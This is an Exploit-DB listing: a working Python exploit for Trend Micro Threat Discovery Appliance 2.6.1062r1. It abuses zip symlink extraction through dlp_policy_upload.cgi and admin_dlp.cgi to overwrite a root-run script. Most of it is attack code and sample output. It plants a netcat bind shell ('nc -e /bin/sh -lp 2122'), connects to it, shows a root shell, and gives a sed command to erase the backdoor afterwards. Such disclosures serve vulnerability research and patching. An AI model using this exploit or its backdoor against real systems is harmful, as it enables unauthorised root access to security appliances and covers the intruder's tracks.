Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution

EDB-ID:

43920

CVE:

N/A


Author:

mr_me

Type:

remote


Platform:

Linux

Date:

2018-01-28


#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ 
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1

Summary:
========

The vulnerabity is that the dlp_policy_upload.cgi allows the upload of a zip file, located statically as: /var/dlp_policy.zip.
The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations:

- /eng_ptn_stores/prod/sensorSDK/data/
- /eng_ptn_stores/prod/sensorSDK/backup_pol/

We can then use symlinks to craft a symlinked that points to /opt/TrendMicro/MinorityReport/bin/

ls -la /eng_ptn_stores/prod/sensorSDK/data/si
lrwxrwxrwx    1 root     root           35 Sep  3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/

Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed...

Notes:
======

- For this particular PoC, all I did was exec a bind shell using netcat showing that there is no firewall protections...
- Auth is bypassed in an alternate poc, so we can attack this with the default password...

Exploitation
============

This is a clever trick, basically, we cant traverse since unzip checks for ../ (even though spec says its ok).
We can still exploit this however by extracting a symlink to say a directory and then write into that directory.

For example, if you wanted to link to /tmp you would

ln -s /tmp/ pwn
zip --symlinks -r foo.zip pwn 

Now foo.zip contains the symlink to /tmp. Once this is extracted, the symlink will be written to disk.
All we need todo now is create another zip file with the folder and file...

zip -r foo.zip pwn/hax.txt

Now after extracting foo.zip, we will write hax.txt into /tmp. Of course, we can automate this magic via python.

So, in summary, the steps to attack this target are:

1. Bypass the auth via XXXX
2. upload a zip with a symlink 
3. trigger extraction, crafting the malicious symlink
4. upload another zip with the malicious dlp_kill.sh file
5. trigger extraction, the symlink fires and crushs /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
6. trigger the execution of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh via admin_dlp.cgi

Greetz to the busticati, you know who you are. My home boys.

saturn:~ mr_me$ ./poc.py 
(+) usage: ./poc.py <target> <pass>
(+) eg: ./poc.py 172.16.175.123 admin
saturn:~ mr_me$ ./poc.py 172.16.175.123 admin123
(+) logged into the target...
(+) performing initial preflight attack...!
(+) uploading the zipped symlink...
(+) successfuly uploaded the zipped symlink
(+) extracting the symlink...
(+) extracted the symlink!
(+) uploading the zipped dlp_kill.sh...
(+) successfuly uploaded the zipped log_cache.sh
(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/...
(+) extracted the dlp_kill.sh file!
(+) starting backdoor...
(+) backdoor started !
(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !
(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh

kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
    sleep 1;
    sid=`pidof sensormain`
    if [ "$sid" -eq "" ]; then
        break
    else
        if [ $i -eq 4 ]; then
            kill -9 $sid
        fi
    fi
done
`nc -e /bin/sh -lp 2122>/dev/null`
sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
#!/bin/sh

kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
    sleep 1;
    sid=`pidof sensormain`
    if [ "$sid" -eq "" ]; then
        break
    else
        if [ $i -eq 4 ]; then
            kill -9 $sid
        fi
    fi
done
exit

Cleanup:
========

We just use "sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh" to remove the last line
of the script (the backdoor).
"""
import os
import sys
import time
import zipfile
import requests
import threading
from cStringIO import StringIO

requests.packages.urllib3.disable_warnings()

def _get_bd():
    bd = """#!/bin/sh

kill `pidof sensorworker sensormain`
for i in `seq 0 4`;
do
    sleep 1;
    sid=`pidof sensormain`
    if [ "$sid" -eq "" ]; then
        break
    else
        if [ $i -eq 4 ]; then
            kill -9 $sid
        fi
    fi
done
`%s>/dev/null`
""" % c
    return bd

def _build_zip(CREATE_SYMLINK=False):
    """
    builds the zip file using a symlink attack into a folder...
    so we symlink the /opt/TrendMicro/MinorityReport/bin/ directory
    and then crush the dlp_kill.sh only to then later get it executed
    resulting in rce as root.
    """
    if CREATE_SYMLINK:
        zipinfo = zipfile.ZipInfo()
        zipinfo.filename = u'si'
        zipinfo.external_attr |= 0120000 << 16L         # symlink file type
        zipinfo.compress_type = zipfile.ZIP_STORED
    f = StringIO()
    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
    if CREATE_SYMLINK:
        z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/")
    else:
        zipinfo = zipfile.ZipInfo("si/dlp_kill.sh")
        zipinfo.external_attr = 0777 << 16L # give full access to included filezipinfo

        # backdooring code, as we do
        z.writestr(zipinfo, _get_bd())
    z.close()
    test = open('hax.zip','wb')
    test.write(f.getvalue())
    test.close()
    return f.getvalue()

def we_can_upload_a_zip(CREATE_SYMLINK=False):
    """
    uploads a zip file with php code inside to our target for exploitation
    """
    multiple_files = {
        'Q_UPLOAD_ID': (None, ''),
        'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'),
        'submit': (None, 'Import')   
    }
    r = s.post(upload_url, files=multiple_files, verify=False)
    if r.status_code == 200:
        return True
    return False

def unzip():
    try:
        r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False)
    except:
        pass
    return True

def we_can_login():
    r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
    if "frame.cgi" in r.text:
        return True
    return False

def main():
    global c, s, t, p, login_url, unzip_url, upload_url
    if len(sys.argv) != 3:
        print "(+) usage: %s <target> <pass>" % sys.argv[0]
        print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0]
        sys.exit(-1)
    t = sys.argv[1]
    p = sys.argv[2]
    bu = "https://%s/" % t
    login_url  = "%scgi-bin/logon.cgi" % bu
    unzip_url  = "%scgi-bin/admin_dlp.cgi" % bu
    upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu
    s = requests.Session()

    # 1st we bypass auth and login
    if we_can_login():

        # we just use a bind, demonstrating that the target doesnt even have a proper firewall!
        c = "nc -e /bin/sh -lp 2122"
        print "(+) logged into the target..."
        print "(+) performing initial preflight attack...!"
        print "(+) uploading the zipped symlink..."

        # 2nd we upload symlink attack
        if we_can_upload_a_zip(CREATE_SYMLINK=True):
            print "(+) successfuly uploaded the zipped symlink"
            print "(+) extracting the symlink..."

            # 3rd we extract it
            unzip()
            print "(+) extracted the symlink!"
            time.sleep(2)   # let the server process things
            print "(+) uploading the zipped dlp_kill.sh..."

            # 4th we upload the backdoor
            if we_can_upload_a_zip(CREATE_SYMLINK=False):
                print "(+) successfuly uploaded the zipped log_cache.sh"
                print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..."

                # 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                unzip()
                print "(+) extracted the dlp_kill.sh file!"
                print "(+) starting backdoor..."

                # 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
                thread = threading.Thread(target=unzip, args=())
                thread.daemon = True
                thread.start()
                print "(+) backdoor started !"
                print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !"
                print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh"
                time.sleep(2)
                os.system("nc %s 2122" % t)
if __name__ == '__main__':
    main()